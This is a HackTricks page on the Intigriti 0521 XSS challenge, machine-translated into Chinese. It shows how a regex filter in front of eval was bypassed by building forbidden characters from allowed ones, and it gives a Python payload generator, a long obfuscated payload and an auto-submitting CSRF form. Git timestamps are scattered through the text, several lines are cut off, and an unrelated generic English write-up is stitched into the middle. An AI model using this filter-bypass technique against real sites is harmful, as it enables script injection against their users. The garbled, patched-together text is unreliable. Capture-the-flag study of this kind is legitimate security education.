2022-12-03 17:35:56 +00:00
# challenge-0521.intigriti.io
2022-04-28 16:01:33 +00:00
< details >
2023-04-25 18:35:28 +00:00
< summary > < a href = "https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology" > < strong > ☁️ HackTricks Cloud ☁️< / strong > < / a > -< a href = "https://twitter.com/hacktricks_live" > < strong > 🐦 Twitter 🐦< / strong > < / a > - < a href = "https://www.twitch.tv/hacktricks_live/schedule" > < strong > 🎙️ Twitch 🎙️< / strong > < / a > - < a href = "https://www.youtube.com/@hacktricks_LIVE" > < strong > 🎥 Youtube 🎥< / strong > < / a > < / summary >
2022-04-28 16:01:33 +00:00
2023-08-03 19:12:22 +00:00
* 你在一家**网络安全公司**工作吗? !
* 发现我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品[**The PEASS Family**](https://opensea.io/collection/the-peass-family)
* 获取[**官方PEASS和HackTricks的衣物**](https://peass.creator-spring.com)
* **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组** ](https://discord.gg/hRep4RUj7f )或[**电报群组**](https://t.me/peass),或者**关注**我在**Twitter**上的[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
* **通过向[hacktricks repo](https://github.com/carlospolop/hacktricks)和[hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)提交PR来分享你的黑客技巧**。
2022-04-28 16:01:33 +00:00
< / details >
2023-08-03 19:12:22 +00:00
### 简要描述 <a href="#brief-description" id="brief-description"></a>
2021-06-07 22:32:49 +00:00
2023-08-03 19:12:22 +00:00
该挑战提供了一个易受XSS攻击的表单,
该表单通过iframe加载在[https://challenge-0521.intigriti.io/](https://challenge-0521.intigriti.io)中。
2021-06-07 22:32:49 +00:00
2023-08-03 19:12:22 +00:00
发现该表单会将用户输入插入到JavaScript的`eval`函数中。这通常是一个不好的做法, ,
然而,在将用户输入插入`eval`函数之前,它会使用正则表达式`/[a-df-z< >()!\\='"]/gi`进行检查,因此如果找到其中任何字符,用户输入将不会在`eval`中执行。\
无论如何,发现了一种绕过正则表达式保护并执行`alert(document.domain)`的方法,滥用了危险的`eval`函数。
2021-06-07 22:32:49 +00:00
2023-08-03 19:12:22 +00:00
### 访问HTML <a href="#accessing-the-html" id="accessing-the-html"></a>
2021-06-07 22:32:49 +00:00
2023-08-03 19:12:22 +00:00
发现允许用户输入字母`e`。还发现有一个使用`id="e"`的HTML元素。因此, :
2021-06-07 22:32:49 +00:00
2023-08-03 19:12:22 +00:00
此外, , ,
2021-06-07 22:32:49 +00:00
```javascript
document.domain
document["domain"]
```
2023-08-03 19:12:22 +00:00
同样的情况也发生在作为函数(方法)的属性上:
2021-06-07 22:32:49 +00:00
```javascript
document.write("1")
document["write"]("1")
```
2023-08-03 19:12:22 +00:00
然后,可以通过类似以下方式从`e` HTML元素访问`document`对象:
2021-06-07 22:32:49 +00:00
```javascript
e["parentNode"]["parentNode"]["parentNode"]["parentNode"]["parentNode"]
```
2023-08-03 19:12:22 +00:00
### 使用字符串形式的JS代码调用函数而不使用括号
2021-06-07 22:32:49 +00:00
2023-08-03 19:12:22 +00:00
从`document`对象中,可以调用`write`函数来**写入浏览器将执行的任意HTML文本**。\
然而,由于`()`字符是**禁止的**,因此无法使用它们来调用函数。不过,可以使用**反引号**(
此外,可以使用`${...}`将要执行的javascript代码作为字符串。
2021-06-07 22:32:49 +00:00
```javascript
`${"alert(document.location)"}`
```
2023-08-03 19:12:22 +00:00
因此,将`document`对象访问与此技术结合起来,可以在不使用括号的情况下执行函数,从而实现执行警报的目的:
2021-06-07 22:32:49 +00:00
```javascript
e["parentNode"]["parentNode"]["parentNode"]["parentNode"]["parentNode"]["write"]`${"< script > alert ( document . location ) < / script > "}`
```
2023-08-03 19:12:22 +00:00
您可以在页面[https://challenge-0521.intigriti.io/captcha.php](https://challenge-0521.intigriti.io/captcha.php)的javascript控制台中测试此代码。
2021-06-07 22:32:49 +00:00
2023-08-03 19:12:22 +00:00
### 最终禁止字符绕过 <a href="#final-forbidden-characters-bypass" id="final-forbidden-characters-bypass"></a>
2021-06-07 22:32:49 +00:00
2023-08-03 19:12:22 +00:00
然而,仍然存在一个问题。大部分的攻击代码中的字符都是**禁止的**,因为它们出现在正则表达式`/[a-df-z< >()!\\='"]/gi`中。但请注意,所有的**禁止字符都是攻击代码中的字符串**,而**攻击代码中的非字符串字符(
这意味着,如果可以**从允许的字符中生成禁止字符的字符串**,就可以生成攻击代码。\
为了做到这一点,我生成了一个类似于[JSFuck](http://www.jsfuck.com)的字母表来生成所需的字符( )
您可以**在攻击代码中看到完整的字母表**( )
2021-06-07 22:32:49 +00:00
2023-08-03 19:12:22 +00:00
例如,为了**生成字母`a`**,可以访问**`[[]/e+e][0][1]`**,因为`[[]/e+e][0]`生成字符串`"NaN[object HTMLProgressElement]"`,或者为了生成**字母`f`**,可以访问**`[[][[]]+e][0]`**的第5个字符,
使用这些技巧和一些更复杂的技巧,可以**生成攻击代码中包含的所有字符(字母和符号)的字符串**:
2021-06-07 22:32:49 +00:00
```javascript
e["parentNode"]["parentNode"]["parentNode"]["parentNode"]["parentNode"]["write"]`${"< script > alert ( document . location ) < / script > "}`
```
2023-08-03 19:12:22 +00:00
### 攻击代码 <a href="#exploit-code" id="exploit-code"></a>
2021-06-07 22:32:49 +00:00
2023-08-03 19:12:22 +00:00
这是用于生成最终攻击的Python攻击代码。如果你执行它, :
2021-06-07 22:32:49 +00:00
```python
#JS Specific Direct Alphabet
x = {
2023-08-03 19:12:22 +00:00
"1": "1",
".": ".",
"[": "[e+e][0][0]",
"]": "[e+e][0][27]",
"/": "[/e/+e][0][0]",
"a": "[[]/e+e][0][1]",
"b": "[e+e][0][2]",
"c": "[e+e][0][5]",
"d": "[[][[]]+e][0][2]",
"e": "[e+e][0][4]",
"f": "[[][[]]+e][0][4]",
"g": "[e+e][0][15]",
"H": "[e+e][0][8]",
"i": "[[][[]]+e][0][5]",
"j": "[e+e][0][3]",
"L": "[e+e][0][11]",
"l": "[e+e][0][21]",
"M": "[e+e][0][10]",
"n": "[[][[]]+e][0][1]",
"N": "[[]/e+e][0][0]",
"o": "[e+e][0][1]",
"r": "[e+e][0][13]",
"s": "[e+e][0][18]",
"t": "[e+e][0][6]",
"T": "[e+e][0][9]",
"u": "[[][[]]+e][0][0]",
2021-06-07 22:32:49 +00:00
}
#JS Dependent Alphabet
#The following alphabet will use previously obtained characters
#Note that this way of getting the characters are custom for the abused HTML
outerHTML = '+'.join(x[k] for k in 'outerHTML')
x['p'] = f'e[{outerHTML}][1]'
x['y'] = f'e[{outerHTML}][39]'
x['< '] = f'e[{outerHTML}][0]'
x['>'] = f'e[{outerHTML}][62]'
x['"'] = f'e[{outerHTML}][13]'
parentNode = '+'.join(x[k] for k in 'parentNode')
document =f'e[{parentNode}][{parentNode}][{parentNode}][{parentNode}][{parentNode}]'
x['h'] = f'e[{parentNode}][{parentNode}][{outerHTML}][15]'
children = '+'.join(x[k] for k in 'children')
captcha = '+'.join(x[k] for k in 'captcha')
x['w'] = f'e[{parentNode}][{parentNode}][{parentNode}][{children}][{captcha}][{x["g"]}][{outerHTML}][35]'
write = '+'.join(x[k] for k in 'write')
x['m'] = f'e[{parentNode}][{parentNode}][{parentNode}][{children}][{captcha}][{x["g"]}][{outerHTML}][38]'
x['('] = f'e[{parentNode}][{parentNode}][{parentNode}][{children}][{captcha}][{x["g"]}][{outerHTML}][42]'
x[')'] = f'e[{parentNode}][{parentNode}][{parentNode}][{children}][{captcha}][{x["g"]}][{outerHTML}][43]'
# Exploit generation
payload_text = '< script > alert ( document [ "domain" ] ) < / script > '
payload = '+'.join(x[k] for k in payload_text)
txt = f'{document}[{write}]'+'`${['+payload+']}`'
print(txt) #Write the exploit to stdout
```
2023-08-03 19:12:22 +00:00
### 攻击 <a href="#exploitation" id="exploitation"></a>
2021-06-07 22:32:49 +00:00
2023-08-03 19:12:22 +00:00
为了生成攻击代码, ,
2021-10-18 11:21:18 +00:00
```
2023-08-03 19:12:22 +00:00
2021-06-07 22:32:49 +00:00
e[e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[[]/e+e][0][1]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]+[e+e][0][6]+[[]/e+e][0][0]+[e+e][0][1]+[[][[]]+e][0][2]+[e+e][0][4]][e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[[]/e+e][0][1]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]+[e+e][0][6]+[[]/e+e][0][0]+[e+e][0][1]+[[][[]]+e][0][2]+[e+e][0][4]][e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[[]/e+e][0][1]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]+[e+e][0][6]+[[]/e+e][0][0]+[e+e][0][1]+[[][[]]+e][0][2]+[e+e][0][4]][e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[[]/e+e][0][1]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]+[e+e][0][6]+[[]/e+e][0][0]+[e+e][0][1]+[[][[]]+e][0][2]+[e+e][0][4]][e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[[]/e+e][0][1]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]+[e+e][0][6]+[[]/e+e][0][0]+[e+e][0][1]+[[][[]]+e][0][2]+[e+e][0][4]][e[e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[[]/e+e][0][1]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]+[e+e][0][6]+[[]/e+e][0][0]+[e+e][0][1]+[[][[]]+e][0][2]+[e+e][0][4]][e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[[]/e+e][0][1]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]+[e+e][0][6]+[[]/e+e][0][0]+[e+e][0][1]+[[][[]]+e][0][2]+[e+e][0][4]][e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[[]/e+e][0][1]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]+[e+e][0][6]+[[]/e+e][0][0]+[e+e][0][1]+[[][[]]+e][0][2]+[e+e][0][4]][[e+e][0][5]+e[e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[[]/e+e][0][1]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]+[e+e][0][6]+[[]/e+e][0][0]+[e+e][0][1]+[[][[]]+e][0][2]+[e+e][0][4]][e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[[]/e+e][0][1]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]+[e+e][0][6]+[[]/e+e][0][0]+[e+e][0][1]+[[][[]]+e][0][2]+[e+e][0][4]][[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][15]+[[][[]]+e][0][5]+[e+e][0][21]+[[][[]]+e][0][2]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]][[e+e][0][5]+[[]/e+e][0][1]+e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[e+e][0][6]+[e+e][0][5]+e[e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[[]/e+e][0][1]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]+[e+e][0][6]+[[]/e+e][0][0]+[e+e][0][1]+[[][[]]+e][0][2]+[e+e][0][4]][e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[[]/e+e][0][1]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]+[e+e][0][6]+[[]/e+e][0][0]+[e+e][0][1]+[[][[]]+e][0][2]+[e+e][0][4]][[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][15]+[[]/e+e][0][1]][[e+e][0][15]][[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][35]+[e+e][0][13]+[[][[]]+e][0][5]+[e+e][0][6]+[e+e][0][4]]`${[e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][0]+[e+e][0][18]+[e+e][0][5]+[e+e][0][13]+[[][[]]+e][0][5]+e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[e+e][0][6]+e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][
2023-08-03 19:12:22 +00:00
# Challenge 0521 - Intigriti CTF Write-up
## Introduction
This challenge is from the Intigriti CTF and involves finding a vulnerability in a web application. The goal is to exploit the vulnerability and retrieve the flag.
## Reconnaissance
We start by performing a basic reconnaissance of the target. We use tools like `nmap` and `dirb` to scan for open ports and discover hidden directories.
## Exploitation
After identifying the target's vulnerabilities, we proceed with the exploitation phase. We use techniques like SQL injection, cross-site scripting (XSS), and remote code execution (RCE) to gain unauthorized access to the system.
2021-06-07 22:32:49 +00:00
2023-08-03 19:12:22 +00:00
## Privilege Escalation
2021-06-07 22:32:49 +00:00
2023-08-03 19:12:22 +00:00
Once we have gained access to the system, we look for ways to escalate our privileges. This may involve exploiting misconfigurations, weak file permissions, or other vulnerabilities.
## Post-Exploitation
After escalating our privileges, we can perform various actions on the compromised system. This may include stealing sensitive data, installing backdoors, or pivoting to other systems on the network.
## Flag Retrieval
The final step is to retrieve the flag. This may involve searching for hidden files, decrypting encrypted data, or bypassing authentication mechanisms.
## Conclusion
In this challenge, we learned how to identify vulnerabilities, exploit them, escalate privileges, and retrieve the flag. These skills are essential for ethical hackers and penetration testers.
然后,您需要**生成一个HTML页面**,加载该页面时,它将**重定向**受害者到**挑战**页面,并在验证码表单中**设置利用**。可以使用以下代码来实现此目的( , ) :
2021-06-07 22:32:49 +00:00
```markup
2023-08-03 19:12:22 +00:00
<!-- CSRF PoC - generated by Burp Suite Professional -->
< body >
< script > history . pushState ( '' , '' , '/' ) < / script >
< form action = "https://challenge-0521.intigriti.io/captcha.php" method = "POST" >
< input type = "hidden" name = "c" value = "e[e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[[]/e+e][0][1]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]+[e+e][0][6]+[[]/e+e][0][0]+[e+e][0][1]+[[][[]]+e][0][2]+[e+e][0][4]][e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[[]/e+e][0][1]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]+[e+e][0][6]+[[]/e+e][0][0]+[e+e][0][1]+[[][[]]+e][0][2]+[e+e][0][4]][e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[[]/e+e][0][1]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]+[e+e][0][6]+[[]/e+e][0][0]+[e+e][0][1]+[[][[]]+e][0][2]+[e+e][0][4]][e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[[]/e+e][0][1]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]+[e+e][0][6]+[[]/e+e][0][0]+[e+e][0][1]+[[][[]]+e][0][2]+[e+e][0][4]][e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8&#
< input type = "submit" value = "提交请求" / >
< / form >
< script >
document.forms[0].submit();
< / script >
< / body >
2021-06-07 22:32:49 +00:00
< / html >
```
2023-08-03 19:12:22 +00:00
最后, , :
2021-06-07 22:32:49 +00:00
2023-08-03 19:12:22 +00:00
只需在验证码表单上按下**提交**,就会执行警报:
2021-06-07 22:32:49 +00:00
2022-04-28 16:01:33 +00:00
< details >
2023-04-25 18:35:28 +00:00
< summary > < a href = "https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology" > < strong > ☁️ HackTricks Cloud ☁️< / strong > < / a > -< a href = "https://twitter.com/hacktricks_live" > < strong > 🐦 Twitter 🐦< / strong > < / a > - < a href = "https://www.twitch.tv/hacktricks_live/schedule" > < strong > 🎙️ Twitch 🎙️< / strong > < / a > - < a href = "https://www.youtube.com/@hacktricks_LIVE" > < strong > 🎥 Youtube 🎥< / strong > < / a > < / summary >
2022-04-28 16:01:33 +00:00
2023-08-03 19:12:22 +00:00
* 你在一家**网络安全公司**工作吗? !
* 发现我们的独家[NFT收藏品**The PEASS Family**](https://opensea.io/collection/the-peass-family)
* 获取[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)
* **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组** ](https://discord.gg/hRep4RUj7f ) 或 [**Telegram群组** ](https://t.me/peass ),或者**关注**我在**Twitter**上的[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
* **通过向[hacktricks仓库](https://github.com/carlospolop/hacktricks)和[hacktricks-cloud仓库](https://github.com/carlospolop/hacktricks-cloud)提交PR来分享你的黑客技巧**。
2022-04-28 16:01:33 +00:00
< / details >
